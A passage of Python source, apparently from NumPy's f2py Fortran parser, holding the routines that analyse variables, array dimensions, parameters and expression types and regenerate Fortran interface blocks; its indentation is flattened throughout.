new_body = []
for b in block['body']:
b = postcrack2(b, tab=tab + '\t', param_map=param_map)
new_body.append(b)
block['body'] = new_body
return block
def postcrack(block, args=None, tab=''):
"""
TODO:
function return values
determine expression types if in argument list
"""
global usermodules, onlyfunctions
if isinstance(block, list):
gret = []
uret = []
for g in block:
setmesstext(g)
g = postcrack(g, tab=tab + '\t')
# sort user routines to appear first
if 'name' in g and '__user__' in g['name']:
uret.append(g)
else:
gret.append(g)
return uret + gret
setmesstext(block)
if not isinstance(block, dict) and 'block' not in block:
raise Exception('postcrack: Expected block dictionary instead of ' +
str(block))
if 'name' in block and not block['name'] == 'unknown_interface':
outmess('%sBlock: %s\n' % (tab, block['name']), 0)
block = analyzeargs(block)
block = analyzecommon(block)
block['vars'] = analyzevars(block)
block['sortvars'] = sortvarnames(block['vars'])
if 'args' in block and block['args']:
args = block['args']
block['body'] = analyzebody(block, args, tab=tab)
userisdefined = []
if 'use' in block:
useblock = block['use']
for k in list(useblock.keys()):
if '__user__' in k:
userisdefined.append(k)
else:
useblock = {}
name = ''
if 'name' in block:
name = block['name']
# and not userisdefined: # Build a __user__ module
if 'externals' in block and block['externals']:
interfaced = []
if 'interfaced' in block:
interfaced = block['interfaced']
mvars = copy.copy(block['vars'])
if name:
mname = name + '__user__routines'
else:
mname = 'unknown__user__routines'
if mname in userisdefined:
i = 1
while '%s_%i' % (mname, i) in userisdefined:
i = i + 1
mname = '%s_%i' % (mname, i)
interface = {'block': 'interface', 'body': [],
'vars': {}, 'name': name + '_user_interface'}
for e in block['externals']:
if e in interfaced:
edef = []
j = -1
for b in block['body']:
j = j + 1
if b['block'] == 'interface':
i = -1
for bb in b['body']:
i = i + 1
if 'name' in bb and bb['name'] == e:
edef = copy.copy(bb)
del b['body'][i]
break
if edef:
if not b['body']:
del block['body'][j]
del interfaced[interfaced.index(e)]
break
interface['body'].append(edef)
else:
if e in mvars and not isexternal(mvars[e]):
interface['vars'][e] = mvars[e]
if interface['vars'] or interface['body']:
block['interfaced'] = interfaced
mblock = {'block': 'python module', 'body': [
interface], 'vars': {}, 'name': mname, 'interfaced': block['externals']}
useblock[mname] = {}
usermodules.append(mblock)
if useblock:
block['use'] = useblock
return block
def sortvarnames(vars):
indep = []
dep = []
for v in list(vars.keys()):
if 'depend' in vars[v] and vars[v]['depend']:
dep.append(v)
else:
indep.append(v)
n = len(dep)
i = 0
while dep: # XXX: How to catch dependence cycles correctly?
v = dep[0]
fl = 0
for w in dep[1:]:
if w in vars[v]['depend']:
fl = 1
break
if fl:
dep = dep[1:] + [v]
i = i + 1
if i > n:
errmess('sortvarnames: failed to compute dependencies because'
' of cyclic dependencies between '
+ ', '.join(dep) + '\n')
indep = indep + dep
break
else:
indep.append(v)
dep = dep[1:]
n = len(dep)
i = 0
return indep
def analyzecommon(block):
if not hascommon(block):
return block
commonvars = []
for k in list(block['common'].keys()):
comvars = []
for e in block['common'][k]:
m = re.match(
r'\A\s*\b(?P<name>.*?)\b\s*(\((?P<dims>.*?)\)|)\s*\Z', e, re.I)
if m:
dims = []
if m.group('dims'):
dims = [x.strip()
for x in markoutercomma(m.group('dims')).split('@,@')]
n = m.group('name').strip()
if n in block['vars']:
if 'attrspec' in block['vars'][n]:
block['vars'][n]['attrspec'].append(
'dimension(%s)' % (','.join(dims)))
else:
block['vars'][n]['attrspec'] = [
'dimension(%s)' % (','.join(dims))]
else:
if dims:
block['vars'][n] = {
'attrspec': ['dimension(%s)' % (','.join(dims))]}
else:
block['vars'][n] = {}
if n not in commonvars:
commonvars.append(n)
else:
n = e
errmess(
'analyzecommon: failed to extract "<name>[(<dims>)]" from "%s" in common /%s/.\n' % (e, k))
comvars.append(n)
block['common'][k] = comvars
if 'commonvars' not in block:
block['commonvars'] = commonvars
else:
block['commonvars'] = block['commonvars'] + commonvars
return block
def analyzebody(block, args, tab=''):
global usermodules, skipfuncs, onlyfuncs, f90modulevars
setmesstext(block)
body = []
for b in block['body']:
b['parent_block'] = block
if b['block'] in ['function', 'subroutine']:
if args is not None and b['name'] not in args:
continue
else:
as_ = b['args']
if b['name'] in skipfuncs:
continue
if onlyfuncs and b['name'] not in onlyfuncs:
continue
b['saved_interface'] = crack2fortrangen(
b, '\n' + ' ' * 6, as_interface=True)
else:
as_ = args
b = postcrack(b, as_, tab=tab + '\t')
if b['block'] == 'interface' and not b['body']:
if 'f2pyenhancements' not in b:
continue
if b['block'].replace(' ', '') == 'pythonmodule':
usermodules.append(b)
else:
if b['block'] == 'module':
f90modulevars[b['name']] = b['vars']
body.append(b)
return body
def buildimplicitrules(block):
setmesstext(block)
implicitrules = defaultimplicitrules
attrrules = {}
if 'implicit' in block:
if block['implicit'] is None:
implicitrules = None
if verbose > 1:
outmess(
'buildimplicitrules: no implicit rules for routine %s.\n' % repr(block['name']))
else:
for k in list(block['implicit'].keys()):
if block['implicit'][k].get('typespec') not in ['static', 'automatic']:
implicitrules[k] = block['implicit'][k]
else:
attrrules[k] = block['implicit'][k]['typespec']
return implicitrules, attrrules
def myeval(e, g=None, l=None):
r = eval(e, g, l)
if type(r) in [type(0), type(0.0)]:
return r
raise ValueError('r=%r' % (r))
getlincoef_re_1 = re.compile(r'\A\b\w+\b\Z', re.I)
def getlincoef(e, xset): # e = a*x+b ; x in xset
try:
c = int(myeval(e, {}, {}))
return 0, c, None
except:
pass
if getlincoef_re_1.match(e):
return 1, 0, e
len_e = len(e)
for x in xset:
if len(x) > len_e:
continue
if re.search(r'\w\s*\([^)]*\b' + x + r'\b', e):
# skip function calls having x as an argument, e.g max(1, x)
continue
re_1 = re.compile(r'(?P<before>.*?)\b' + x + r'\b(?P<after>.*)', re.I)
m = re_1.match(e)
if m:
try:
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 0, m1.group('after'))
m1 = re_1.match(ee)
b = myeval(ee, {}, {})
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 1, m1.group('after'))
m1 = re_1.match(ee)
a = myeval(ee, {}, {}) - b
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 0.5, m1.group('after'))
m1 = re_1.match(ee)
c = myeval(ee, {}, {})
# computing another point to be sure that expression is linear
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 1.5, m1.group('after'))
m1 = re_1.match(ee)
c2 = myeval(ee, {}, {})
if (a * 0.5 + b == c and a * 1.5 + b == c2):
return a, b, x
except:
pass
break
return None, None, None
_varname_match = re.compile(r'\A[a-z]\w*\Z').match
def getarrlen(dl, args, star='*'):
edl = []
try:
edl.append(myeval(dl[0], {}, {}))
except:
edl.append(dl[0])
try:
edl.append(myeval(dl[1], {}, {}))
except:
edl.append(dl[1])
if isinstance(edl[0], int):
p1 = 1 - edl[0]
if p1 == 0:
d = str(dl[1])
elif p1 < 0:
d = '%s-%s' % (dl[1], -p1)
else:
d = '%s+%s' % (dl[1], p1)
elif isinstance(edl[1], int):
p1 = 1 + edl[1]
if p1 == 0:
d = '-(%s)' % (dl[0])
else:
d = '%s-(%s)' % (p1, dl[0])
else:
d = '%s-(%s)+1' % (dl[1], dl[0])
try:
return repr(myeval(d, {}, {})), None, None
except:
pass
d1, d2 = getlincoef(dl[0], args), getlincoef(dl[1], args)
if None not in [d1[0], d2[0]]:
if (d1[0], d2[0]) == (0, 0):
return repr(d2[1] - d1[1] + 1), None, None
b = d2[1] - d1[1] + 1
d1 = (d1[0], 0, d1[2])
d2 = (d2[0], b, d2[2])
if d1[0] == 0 and d2[2] in args:
if b < 0:
return '%s * %s - %s' % (d2[0], d2[2], -b), d2[2], '+%s)/(%s)' % (-b, d2[0])
elif b:
return '%s * %s + %s' % (d2[0], d2[2], b), d2[2], '-%s)/(%s)' % (b, d2[0])
else:
return '%s * %s' % (d2[0], d2[2]), d2[2], ')/(%s)' % (d2[0])
if d2[0] == 0 and d1[2] in args:
if b < 0:
return '%s * %s - %s' % (-d1[0], d1[2], -b), d1[2], '+%s)/(%s)' % (-b, -d1[0])
elif b:
return '%s * %s + %s' % (-d1[0], d1[2], b), d1[2], '-%s)/(%s)' % (b, -d1[0])
else:
return '%s * %s' % (-d1[0], d1[2]), d1[2], ')/(%s)' % (-d1[0])
if d1[2] == d2[2] and d1[2] in args:
a = d2[0] - d1[0]
if not a:
return repr(b), None, None
if b < 0:
return '%s * %s - %s' % (a, d1[2], -b), d2[2], '+%s)/(%s)' % (-b, a)
elif b:
return '%s * %s + %s' % (a, d1[2], b), d2[2], '-%s)/(%s)' % (b, a)
else:
return '%s * %s' % (a, d1[2]), d2[2], ')/(%s)' % (a)
if d1[0] == d2[0] == 1:
c = str(d1[2])
if c not in args:
if _varname_match(c):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c))
c = '(%s)' % c
if b == 0:
d = '%s-%s' % (d2[2], c)
elif b < 0:
d = '%s-%s-%s' % (d2[2], c, -b)
else:
d = '%s-%s+%s' % (d2[2], c, b)
elif d1[0] == 0:
c2 = str(d2[2])
if c2 not in args:
if _varname_match(c2):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c2))
c2 = '(%s)' % c2
if d2[0] == 1:
pass
elif d2[0] == -1:
c2 = '-%s' % c2
else:
c2 = '%s*%s' % (d2[0], c2)
if b == 0:
d = c2
elif b < 0:
d = '%s-%s' % (c2, -b)
else:
d = '%s+%s' % (c2, b)
elif d2[0] == 0:
c1 = str(d1[2])
if c1 not in args:
if _varname_match(c1):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c1))
c1 = '(%s)' % c1
if d1[0] == 1:
c1 = '-%s' % c1
elif d1[0] == -1:
c1 = '+%s' % c1
elif d1[0] < 0:
c1 = '+%s*%s' % (-d1[0], c1)
else:
c1 = '-%s*%s' % (d1[0], c1)
if b == 0:
d = c1
elif b < 0:
d = '%s-%s' % (c1, -b)
else:
d = '%s+%s' % (c1, b)
else:
c1 = str(d1[2])
if c1 not in args:
if _varname_match(c1):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c1))
c1 = '(%s)' % c1
if d1[0] == 1:
c1 = '-%s' % c1
elif d1[0] == -1:
c1 = '+%s' % c1
elif d1[0] < 0:
c1 = '+%s*%s' % (-d1[0], c1)
else:
c1 = '-%s*%s' % (d1[0], c1)
c2 = str(d2[2])
if c2 not in args:
if _varname_match(c2):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c2))
c2 = '(%s)' % c2
if d2[0] == 1:
pass
elif d2[0] == -1:
c2 = '-%s' % c2
else:
c2 = '%s*%s' % (d2[0], c2)
if b == 0:
d = '%s%s' % (c2, c1)
elif b < 0:
d = '%s%s-%s' % (c2, c1, -b)
else:
d = '%s%s+%s' % (c2, c1, b)
return d, None, None
word_pattern = re.compile(r'\b[a-z][\w$]*\b', re.I)
def _get_depend_dict(name, vars, deps):
if name in vars:
words = vars[name].get('depend', [])
if '=' in vars[name] and not isstring(vars[name]):
for word in word_pattern.findall(vars[name]['=']):
if word not in words and word in vars:
words.append(word)
for word in words[:]:
for w in deps.get(word, []) \
or _get_depend_dict(word, vars, deps):
if w not in words:
words.append(w)
else:
outmess('_get_depend_dict: no dependence info for %s\n' % (repr(name)))
words = []
deps[name] = words
return words
def _calc_depend_dict(vars):
names = list(vars.keys())
depend_dict = {}
for n in names:
_get_depend_dict(n, vars, depend_dict)
return depend_dict
def get_sorted_names(vars):
"""
"""
depend_dict = _calc_depend_dict(vars)
names = []
for name in list(depend_dict.keys()):
if not depend_dict[name]:
names.append(name)
del depend_dict[name]
while depend_dict:
for name, lst in list(depend_dict.items()):
new_lst = [n for n in lst if n in depend_dict]
if not new_lst:
names.append(name)
del depend_dict[name]
else:
depend_dict[name] = new_lst
return [name for name in names if name in vars]
def _kind_func(string):
# XXX: return something sensible.
if string[0] in "'\"":
string = string[1:-1]
if real16pattern.match(string):
return 8
elif real8pattern.match(string):
return 4
return 'kind(' + string + ')'
def _selected_int_kind_func(r):
# XXX: This should be processor dependent
m = 10 ** r
if m <= 2 ** 8:
return 1
if m <= 2 ** 16:
return 2
if m <= 2 ** 32:
return 4
if m <= 2 ** 63:
return 8
if m <= 2 ** 128:
return 16
return -1
def _selected_real_kind_func(p, r=0, radix=0):
# XXX: This should be processor dependent
# This is only good for 0 <= p <= 20
if p < 7:
return 4
if p < 16:
return 8
if platform.machine().lower().startswith('power'):
if p <= 20:
return 16
else:
if p < 19:
return 10
elif p <= 20:
return 16
return -1
def get_parameters(vars, global_params={}):
params = copy.copy(global_params)
g_params = copy.copy(global_params)
for name, func in [('kind', _kind_func),
('selected_int_kind', _selected_int_kind_func),
('selected_real_kind', _selected_real_kind_func), ]:
if name not in g_params:
g_params[name] = func
param_names = []
for n in get_sorted_names(vars):
if 'attrspec' in vars[n] and 'parameter' in vars[n]['attrspec']:
param_names.append(n)
kind_re = re.compile(r'\bkind\s*\(\s*(?P<value>.*)\s*\)', re.I)
selected_int_kind_re = re.compile(
r'\bselected_int_kind\s*\(\s*(?P<value>.*)\s*\)', re.I)
selected_kind_re = re.compile(
r'\bselected_(int|real)_kind\s*\(\s*(?P<value>.*)\s*\)', re.I)
for n in param_names:
if '=' in vars[n]:
v = vars[n]['=']
if islogical(vars[n]):
v = v.lower()
for repl in [
('.false.', 'False'),
('.true.', 'True'),
# TODO: test .eq., .neq., etc replacements.
]:
v = v.replace(*repl)
v = kind_re.sub(r'kind("\1")', v)
v = selected_int_kind_re.sub(r'selected_int_kind(\1)', v)
if isinteger(vars[n]) and not selected_kind_re.match(v):
v = v.split('_')[0]
if isdouble(vars[n]):
tt = list(v)
for m in real16pattern.finditer(v):
tt[m.start():m.end()] = list(
v[m.start():m.end()].lower().replace('d', 'e'))
v = ''.join(tt)
if iscomplex(vars[n]):
if v[0] == '(' and v[-1] == ')':
# FIXME, unused l looks like potential bug
l = markoutercomma(v[1:-1]).split('@,@')
try:
params[n] = eval(v, g_params, params)
except Exception as msg:
params[n] = v
outmess('get_parameters: got "%s" on %s\n' % (msg, repr(v)))
if isstring(vars[n]) and isinstance(params[n], int):
params[n] = chr(params[n])
nl = n.lower()
if nl != n:
params[nl] = params[n]
else:
print(vars[n])
outmess(
'get_parameters:parameter %s does not have value?!\n' % (repr(n)))
return params
def _eval_length(length, params):
if length in ['(:)', '(*)', '*']:
return '(*)'
return _eval_scalar(length, params)
_is_kind_number = re.compile(r'\d+_').match
def _eval_scalar(value, params):
if _is_kind_number(value):
value = value.split('_')[0]
try:
value = str(eval(value, {}, params))
except (NameError, SyntaxError):
return value
except Exception as msg:
errmess('"%s" in evaluating %r '
'(available names: %s)\n'
% (msg, value, list(params.keys())))
return value
def analyzevars(block):
global f90modulevars
setmesstext(block)
implicitrules, attrrules = buildimplicitrules(block)
vars = copy.copy(block['vars'])
if block['block'] == 'function' and block['name'] not in vars:
vars[block['name']] = {}
if '' in block['vars']:
del vars['']
if 'attrspec' in block['vars']['']:
gen = block['vars']['']['attrspec']
for n in list(vars.keys()):
for k in ['public', 'private']:
if k in gen:
vars[n] = setattrspec(vars[n], k)
svars = []
args = block['args']
for a in args:
try:
vars[a]
svars.append(a)
except KeyError:
pass
for n in list(vars.keys()):
if n not in args:
svars.append(n)
params = get_parameters(vars, get_useparameters(block))
dep_matches = {}
name_match = re.compile(r'\w[\w\d_$]*').match
for v in list(vars.keys()):
m = name_match(v)
if m:
n = v[m.start():m.end()]
try:
dep_matches[n]
except KeyError:
dep_matches[n] = re.compile(r'.*\b%s\b' % (v), re.I).match
for n in svars:
if n[0] in list(attrrules.keys()):
vars[n] = setattrspec(vars[n], attrrules[n[0]])
if 'typespec' not in vars[n]:
if not('attrspec' in vars[n] and 'external' in vars[n]['attrspec']):
if implicitrules:
ln0 = n[0].lower()
for k in list(implicitrules[ln0].keys()):
if k == 'typespec' and implicitrules[ln0][k] == 'undefined':
continue
if k not in vars[n]:
vars[n][k] = implicitrules[ln0][k]
elif k == 'attrspec':
for l in implicitrules[ln0][k]:
vars[n] = setattrspec(vars[n], l)
elif n in block['args']:
outmess('analyzevars: typespec of variable %s is not defined in routine %s.\n' % (
repr(n), block['name']))
if 'charselector' in vars[n]:
if 'len' in vars[n]['charselector']:
l = vars[n]['charselector']['len']
try:
l = str(eval(l, {}, params))
except:
pass
vars[n]['charselector']['len'] = l
if 'kindselector' in vars[n]:
if 'kind' in vars[n]['kindselector']:
l = vars[n]['kindselector']['kind']
try:
l = str(eval(l, {}, params))
except:
pass
vars[n]['kindselector']['kind'] = l
savelindims = {}
if 'attrspec' in vars[n]:
attr = vars[n]['attrspec']
attr.reverse()
vars[n]['attrspec'] = []
dim, intent, depend, check, note = None, None, None, None, None
for a in attr:
if a[:9] == 'dimension':
dim = (a[9:].strip())[1:-1]
elif a[:6] == 'intent':
intent = (a[6:].strip())[1:-1]
elif a[:6] == 'depend':
depend = (a[6:].strip())[1:-1]
elif a[:5] == 'check':
check = (a[5:].strip())[1:-1]
elif a[:4] == 'note':
note = (a[4:].strip())[1:-1]
else:
vars[n] = setattrspec(vars[n], a)
if intent:
if 'intent' not in vars[n]:
vars[n]['intent'] = []
for c in [x.strip() for x in markoutercomma(intent).split('@,@')]:
# Remove spaces so that 'in out' becomes 'inout'
tmp = c.replace(' ', '')
if tmp not in vars[n]['intent']:
vars[n]['intent'].append(tmp)
intent = None
if note:
note = note.replace('\\n\\n', '\n\n')
note = note.replace('\\n ', '\n')
if 'note' not in vars[n]:
vars[n]['note'] = [note]
else:
vars[n]['note'].append(note)
note = None
if depend is not None:
if 'depend' not in vars[n]:
vars[n]['depend'] = []
for c in rmbadname([x.strip() for x in markoutercomma(depend).split('@,@')]):
if c not in vars[n]['depend']:
vars[n]['depend'].append(c)
depend = None
if check is not None:
if 'check' not in vars[n]:
vars[n]['check'] = []
for c in [x.strip() for x in markoutercomma(check).split('@,@')]:
if c not in vars[n]['check']:
vars[n]['check'].append(c)
check = None
if dim and 'dimension' not in vars[n]:
vars[n]['dimension'] = []
for d in rmbadname([x.strip() for x in markoutercomma(dim).split('@,@')]):
star = '*'
if d == ':':
star = ':'
if d in params:
d = str(params[d])
for p in list(params.keys()):
re_1 = re.compile(r'(?P<before>.*?)\b' + p + r'\b(?P<after>.*)', re.I)
m = re_1.match(d)
while m:
d = m.group('before') + \
str(params[p]) + m.group('after')
m = re_1.match(d)
if d == star:
dl = [star]
else:
dl = markoutercomma(d, ':').split('@:@')
if len(dl) == 2 and '*' in dl: # e.g. dimension(5:*)
dl = ['*']
d = '*'
if len(dl) == 1 and not dl[0] == star:
dl = ['1', dl[0]]
if len(dl) == 2:
d, v, di = getarrlen(dl, list(block['vars'].keys()))
if d[:4] == '1 * ':
d = d[4:]
if di and di[-4:] == '/(1)':
di = di[:-4]
if v:
savelindims[d] = v, di
vars[n]['dimension'].append(d)
if 'dimension' in vars[n]:
if isintent_c(vars[n]):
shape_macro = 'shape'
else:
shape_macro = 'shape' # 'fshape'
if isstringarray(vars[n]):
if 'charselector' in vars[n]:
d = vars[n]['charselector']
if '*' in d:
d = d['*']
errmess('analyzevars: character array "character*%s %s(%s)" is considered as "character %s(%s)"; "intent(c)" is forced.\n'
% (d, n,
','.join(vars[n]['dimension']),
n, ','.join(vars[n]['dimension'] + [d])))
vars[n]['dimension'].append(d)
del vars[n]['charselector']
if 'intent' not in vars[n]:
vars[n]['intent'] = []
if 'c' not in vars[n]['intent']:
vars[n]['intent'].append('c')
else:
errmess(
"analyzevars: charselector=%r unhandled." % (d))
if 'check' not in vars[n] and 'args' in block and n in block['args']:
flag = 'depend' not in vars[n]
if flag:
vars[n]['depend'] = []
vars[n]['check'] = []
if 'dimension' in vars[n]:
#/----< no check
i = -1
ni = len(vars[n]['dimension'])
for d in vars[n]['dimension']:
ddeps = [] # dependecies of 'd'
ad = ''
pd = ''
if d not in vars:
if d in savelindims:
pd, ad = '(', savelindims[d][1]
d = savelindims[d][0]
else:
for r in block['args']:
if r not in vars:
continue
if re.match(r'.*?\b' + r + r'\b', d, re.I):
ddeps.append(r)
if d in vars:
if 'attrspec' in vars[d]:
for aa in vars[d]['attrspec']:
if aa[:6] == 'depend':
ddeps += aa[6:].strip()[1:-1].split(',')
if 'depend' in vars[d]:
ddeps = ddeps + vars[d]['depend']
i = i + 1
if d in vars and ('depend' not in vars[d]) \
and ('=' not in vars[d]) and (d not in vars[n]['depend']) \
and l_or(isintent_in, isintent_inout, isintent_inplace)(vars[n]):
vars[d]['depend'] = [n]
if ni > 1:
vars[d]['='] = '%s%s(%s,%s)%s' % (
pd, shape_macro, n, i, ad)
else:
vars[d]['='] = '%slen(%s)%s' % (pd, n, ad)
# /---< no check
if 1 and 'check' not in vars[d]:
if ni > 1:
vars[d]['check'] = ['%s%s(%s,%i)%s==%s'
% (pd, shape_macro, n, i, ad, d)]
else:
vars[d]['check'] = [
'%slen(%s)%s>=%s' % (pd, n, ad, d)]
if 'attrspec' not in vars[d]:
vars[d]['attrspec'] = ['optional']
if ('optional' not in vars[d]['attrspec']) and\
('required' not in vars[d]['attrspec']):
vars[d]['attrspec'].append('optional')
elif d not in ['*', ':']:
#/----< no check
if flag:
if d in vars:
if n not in ddeps:
vars[n]['depend'].append(d)
else:
vars[n]['depend'] = vars[n]['depend'] + ddeps
elif isstring(vars[n]):
length = '1'
if 'charselector' in vars[n]:
if '*' in vars[n]['charselector']:
length = _eval_length(vars[n]['charselector']['*'],
params)
vars[n]['charselector']['*'] = length
elif 'len' in vars[n]['charselector']:
length = _eval_length(vars[n]['charselector']['len'],
params)
del vars[n]['charselector']['len']
vars[n]['charselector']['*'] = length
if not vars[n]['check']:
del vars[n]['check']
if flag and not vars[n]['depend']:
del vars[n]['depend']
if '=' in vars[n]:
if 'attrspec' not in vars[n]:
vars[n]['attrspec'] = []
if ('optional' not in vars[n]['attrspec']) and \
('required' not in vars[n]['attrspec']):
vars[n]['attrspec'].append('optional')
if 'depend' not in vars[n]:
vars[n]['depend'] = []
for v, m in list(dep_matches.items()):
if m(vars[n]['=']):
vars[n]['depend'].append(v)
if not vars[n]['depend']:
del vars[n]['depend']
if isscalar(vars[n]):
vars[n]['='] = _eval_scalar(vars[n]['='], params)
for n in list(vars.keys()):
if n == block['name']: # n is block name
if 'note' in vars[n]:
block['note'] = vars[n]['note']
if block['block'] == 'function':
if 'result' in block and block['result'] in vars:
vars[n] = appenddecl(vars[n], vars[block['result']])
if 'prefix' in block:
pr = block['prefix']
ispure = 0
isrec = 1
pr1 = pr.replace('pure', '')
ispure = (not pr == pr1)
pr = pr1.replace('recursive', '')
isrec = (not pr == pr1)
m = typespattern[0].match(pr)
if m:
typespec, selector, attr, edecl = cracktypespec0(
m.group('this'), m.group('after'))
kindselect, charselect, typename = cracktypespec(
typespec, selector)
vars[n]['typespec'] = typespec
if kindselect:
if 'kind' in kindselect:
try:
kindselect['kind'] = eval(
kindselect['kind'], {}, params)
except:
pass
vars[n]['kindselector'] = kindselect
if charselect:
vars[n]['charselector'] = charselect
if typename:
vars[n]['typename'] = typename
if ispure:
vars[n] = setattrspec(vars[n], 'pure')
if isrec:
vars[n] = setattrspec(vars[n], 'recursive')
else:
outmess(
'analyzevars: prefix (%s) were not used\n' % repr(block['prefix']))
if not block['block'] in ['module', 'pythonmodule', 'python module', 'block data']:
if 'commonvars' in block:
neededvars = copy.copy(block['args'] + block['commonvars'])
else:
neededvars = copy.copy(block['args'])
for n in list(vars.keys()):
if l_or(isintent_callback, isintent_aux)(vars[n]):
neededvars.append(n)
if 'entry' in block:
neededvars.extend(list(block['entry'].keys()))
for k in list(block['entry'].keys()):
for n in block['entry'][k]:
if n not in neededvars:
neededvars.append(n)
if block['block'] == 'function':
if 'result' in block:
neededvars.append(block['result'])
else:
neededvars.append(block['name'])
if block['block'] in ['subroutine', 'function']:
name = block['name']
if name in vars and 'intent' in vars[name]:
block['intent'] = vars[name]['intent']
if block['block'] == 'type':
neededvars.extend(list(vars.keys()))
for n in list(vars.keys()):
if n not in neededvars:
del vars[n]
return vars
analyzeargs_re_1 = re.compile(r'\A[a-z]+[\w$]*\Z', re.I)
def expr2name(a, block, args=[]):
orig_a = a
a_is_expr = not analyzeargs_re_1.match(a)
if a_is_expr: # `a` is an expression
implicitrules, attrrules = buildimplicitrules(block)
at = determineexprtype(a, block['vars'], implicitrules)
na = 'e_'
for c in a:
c = c.lower()
if c not in string.ascii_lowercase + string.digits:
c = '_'
na = na + c
if na[-1] == '_':
na = na + 'e'
else:
na = na + '_e'
a = na
while a in block['vars'] or a in block['args']:
a = a + 'r'
if a in args:
k = 1
while a + str(k) in args:
k = k + 1
a = a + str(k)
if a_is_expr:
block['vars'][a] = at
else:
if a not in block['vars']:
if orig_a in block['vars']:
block['vars'][a] = block['vars'][orig_a]
else:
block['vars'][a] = {}
if 'externals' in block and orig_a in block['externals'] + block['interfaced']:
block['vars'][a] = setattrspec(block['vars'][a], 'external')
return a
def analyzeargs(block):
setmesstext(block)
implicitrules, attrrules = buildimplicitrules(block)
if 'args' not in block:
block['args'] = []
args = []
for a in block['args']:
a = expr2name(a, block, args)
args.append(a)
block['args'] = args
if 'entry' in block:
for k, args1 in list(block['entry'].items()):
for a in args1:
if a not in block['vars']:
block['vars'][a] = {}
for b in block['body']:
if b['name'] in args:
if 'externals' not in block:
block['externals'] = []
if b['name'] not in block['externals']:
block['externals'].append(b['name'])
if 'result' in block and block['result'] not in block['vars']:
block['vars'][block['result']] = {}
return block
determineexprtype_re_1 = re.compile(r'\A\(.+?[,].+?\)\Z', re.I)
determineexprtype_re_2 = re.compile(r'\A[+-]?\d+(_(P<name>[\w]+)|)\Z', re.I)
determineexprtype_re_3 = re.compile(
r'\A[+-]?[\d.]+[\d+-de.]*(_(P<name>[\w]+)|)\Z', re.I)
determineexprtype_re_4 = re.compile(r'\A\(.*\)\Z', re.I)
determineexprtype_re_5 = re.compile(r'\A(?P<name>\w+)\s*\(.*?\)\s*\Z', re.I)
def _ensure_exprdict(r):
if isinstance(r, int):
return {'typespec': 'integer'}
if isinstance(r, float):
return {'typespec': 'real'}
if isinstance(r, complex):
return {'typespec': 'complex'}
if isinstance(r, dict):
return r
raise AssertionError(repr(r))
def determineexprtype(expr, vars, rules={}):
if expr in vars:
return _ensure_exprdict(vars[expr])
expr = expr.strip()
if determineexprtype_re_1.match(expr):
return {'typespec': 'complex'}
m = determineexprtype_re_2.match(expr)
if m:
if 'name' in m.groupdict() and m.group('name'):
outmess(
'determineexprtype: selected kind types not supported (%s)\n' % repr(expr))
return {'typespec': 'integer'}
m = determineexprtype_re_3.match(expr)
if m:
if 'name' in m.groupdict() and m.group('name'):
outmess(
'determineexprtype: selected kind types not supported (%s)\n' % repr(expr))
return {'typespec': 'real'}
for op in ['+', '-', '*', '/']:
for e in [x.strip() for x in markoutercomma(expr, comma=op).split('@' + op + '@')]:
if e in vars:
return _ensure_exprdict(vars[e])
t = {}
if determineexprtype_re_4.match(expr): # in parenthesis
t = determineexprtype(expr[1:-1], vars, rules)
else:
m = determineexprtype_re_5.match(expr)
if m:
rn = m.group('name')
t = determineexprtype(m.group('name'), vars, rules)
if t and 'attrspec' in t:
del t['attrspec']
if not t:
if rn[0] in rules:
return _ensure_exprdict(rules[rn[0]])
if expr[0] in '\'"':
return {'typespec': 'character', 'charselector': {'*': '*'}}
if not t:
outmess(
'determineexprtype: could not determine expressions (%s) type.\n' % (repr(expr)))
return t
######
def crack2fortrangen(block, tab='\n', as_interface=False):
global skipfuncs, onlyfuncs
setmesstext(block)
ret = ''
if isinstance(block, list):
for g in block:
if g and g['block'] in ['function', 'subroutine']:
if g['name'] in skipfuncs:
continue
if onlyfuncs and g['name'] not in onlyfuncs:
continue
ret = ret + crack2fortrangen(g, tab, as_interface=as_interface)
return ret
prefix = ''
name = ''
args = ''
blocktype = block['block']
if blocktype == 'program':
return ''
argsl = []
if 'name' in block:
name = block['name']
if 'args' in block:
vars = block['vars']
for a in block['args']:
a = expr2name(a, block, argsl)
if not isintent_callback(vars[a]):
argsl.append(a)
if block['block'] == 'function' or argsl:
args = '(%s)' % ','.join(argsl)
f2pyenhancements = ''
if 'f2pyenhancements' in block:
for k in list(block['f2pyenhancements'].keys()):
f2pyenhancements = '%s%s%s %s' % (
f2pyenhancements, tab + tabchar, k, block['f2pyenhancements'][k])
intent_lst = block.get('intent', [])[:]
if blocktype == 'function' and 'callback' in intent_lst:
intent_lst.remove('callback')
if intent_lst:
f2pyenhancements = '%s%sintent(%s) %s' %\
(f2pyenhancements, tab + tabchar,
','.join(intent_lst), name)
use = ''
if 'use' in block:
use = use2fortran(block['use'], tab + tabchar)
common = ''
if 'common' in block:
common = common2fortran(block['common'], tab + tabchar)
if name == 'unknown_interface':
name = ''
result = ''
if 'result' in block:
result = ' result (%s)' % block['result']
if block['result'] not in argsl:
argsl.append(block['result'])
body = crack2fortrangen(block['body'], tab + tabchar)
vars = vars2fortran(
block, block['vars'], argsl, tab + tabchar, as_interface=as_interface)
mess = ''
if 'from' in block and not as_interface:
mess = '! in %s' % block['from']
if 'entry' in block:
entry_stmts = ''
for k, i in list(block['entry'].items()):
entry_stmts = '%s%sentry %s(%s)' \
% (entry_stmts, tab + tabchar, k, ','.join(i))
body = body + entry_stmts
if blocktype == 'block data' and name == '_BLOCK_DATA_':
name = ''
ret = '%s%s%s %s%s%s %s%s%s%s%s%s%send %s %s' % (
tab, prefix, blocktype, name, args, result, mess, f2pyenhancements, use, vars, common, body, tab, blocktype, name)
return ret
def common2fortran(common, tab=''):
ret = ''
for k in list(common.keys()):
if k == '_BLNK_':
ret = '%s%scommon %s' % (ret, tab, ','.join(common[k]))
else:
ret = '%s%scommon /%s/ %s' % (ret, tab, k, ','.join(common[k]))
return ret
def use2fortran(use, tab=''):
ret = ''
